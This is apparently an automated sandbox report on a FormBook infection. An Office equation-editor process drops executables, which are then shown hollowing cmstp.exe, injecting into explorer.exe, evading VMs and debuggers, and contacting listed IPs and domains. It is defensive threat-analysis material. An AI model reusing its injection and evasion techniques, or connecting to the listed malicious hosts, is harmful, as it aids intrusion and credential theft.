          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00416A89 push eax; retf 7_2_00416A8A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A31B push eax; retf 7_2_0041A31C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041C3A6 push es; iretd 7_2_0041C3AA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041D475 push eax; ret 7_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041D4C2 push eax; ret 7_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041D4CB push eax; ret 7_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00417CAD pushad ; ret 7_2_00417CAE
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041D52C push eax; ret 7_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_004176C2 pushad ; iretd 7_2_004176C3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041EFF7 push dword ptr [98C25110h]; ret 7_2_0041F073
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084DFA1 push ecx; ret 7_2_0084DFB4
          Source: C:\Windows\explorer.exeCode function: 8_2_0818C9B5 push esp; retn 0000h8_2_0818CAE7
          Source: C:\Windows\explorer.exeCode function: 8_2_0818CB1E push esp; retn 0000h8_2_0818CB1F
          Source: twbcaze.exe.5.drStatic PE information: section name: .00cfg
          Source: twbcaze.exe.5.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\twbcaze.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_6-17443
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-13974
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3332Thread sleep time: -15390000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3332Thread sleep time: -4416000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292Thread sleep count: 136 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292Thread sleep time: -272000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292Thread sleep count: 9836 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3292Thread sleep time: -19672000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3360Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7695Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2208Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeWindow / User API: threadDelayed 9836Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00409AA0 rdtsc 7_2_00409AA0
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_5-3463
          Source: explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
          Source: explorer.exe, 00000008.00000002.880167411.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000002.880167411.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
          Source: explorer.exe, 00000008.00000000.354257988.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
          Source: explorer.exe, 00000008.00000002.880167411.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_002307DA GetSystemInfo,6_2_002307DA
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405E93 FindFirstFileA,FindClose,5_2_00405E93
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054BD
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402671 FindFirstFileA,5_2_00402671
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004203E8 _free,_free,FindFirstFileExW,6_2_004203E8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0042049C FindFirstFileExW,FindNextFileW,FindClose,6_2_0042049C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004132A3 mov eax, dword ptr fs:[00000030h]6_2_004132A3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0041DCB5 mov eax, dword ptr fs:[00000030h]6_2_0041DCB5
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0023005F mov eax, dword ptr fs:[00000030h]6_2_0023005F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0023013E mov eax, dword ptr fs:[00000030h]6_2_0023013E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_00230109 mov eax, dword ptr fs:[00000030h]6_2_00230109
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0023017B mov eax, dword ptr fs:[00000030h]6_2_0023017B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00830080 mov ecx, dword ptr fs:[00000030h]7_2_00830080
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008300EA mov eax, dword ptr fs:[00000030h]7_2_008300EA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008526F8 mov eax, dword ptr fs:[00000030h]7_2_008526F8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EB00EA mov eax, dword ptr fs:[00000030h]9_2_01EB00EA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EB0080 mov ecx, dword ptr fs:[00000030h]9_2_01EB0080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED26F8 mov eax, dword ptr fs:[00000030h]9_2_01ED26F8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004156E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004156E6
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0041C365 GetProcessHeap,6_2_0041C365
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00409AA0 rdtsc 7_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0040ACE0 LdrLoadDll,7_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0040F6FD SetUnhandledExceptionFilter,6_2_0040F6FD
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004156E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004156E6
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0040FEFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040FEFD
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0040F709 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040F709

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.150.181.71 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.allamericanshuttlellc.com
          Source: C:\Windows\explorer.exeDomain query: www.6061k.vip
          Source: C:\Windows\explorer.exeDomain query: www.shucaimh.com
          Source: C:\Windows\explorer.exeDomain query: www.xazeyu.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.164.111.101 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\twbcaze.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeThread register set: target process: 1244Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 1244Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"Jump to behavior
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
          Source: explorer.exe, 00000008.00000002.879437350.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.354104889.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.879437350.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.354104889.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.879437350.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.354104889.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetLocaleInfoW,6_2_00420043
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: EnumSystemLocalesW,6_2_0041FA29
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_0041FAC4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: EnumSystemLocalesW,6_2_0041BC92
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetLocaleInfoW,6_2_0041FD76
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: EnumSystemLocalesW,6_2_0041FD17
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: EnumSystemLocalesW,6_2_0041FE4B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetLocaleInfoW,6_2_0041FE96
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0041FF3D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0041F7D3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: GetLocaleInfoW,6_2_0041B7A1
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0040F496 cpuid 6_2_0040F496
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_00410221 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00410221
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030FB

          Stealing of Sensitive Information

          barindex
          Yara detected NSISDropper
          Source: Yara matchFile source: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected NSISDropper
          Source: Yara matchFile source: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
          Valid Accounts1
          Native API          		Path Interception512
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium5
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
          System Shutdown/Reboot          		Acquire InfrastructureGather Victim Identity Information
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts3
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth11
          Encrypted Channel          		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
          Domain Accounts23
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager127
          System Information Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Data Encrypted for ImpactDNS ServerEmail Addresses
          Local Accounts3
          Command and Scripting Interpreter          		Login HookLogin Hook1
          Rootkit          		NTDS1
          Query Registry          		Distributed Component Object ModelInput CaptureTraffic Duplication114
          Application Layer Protocol          		Data DestructionVirtual Private ServerEmployee Names
          Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
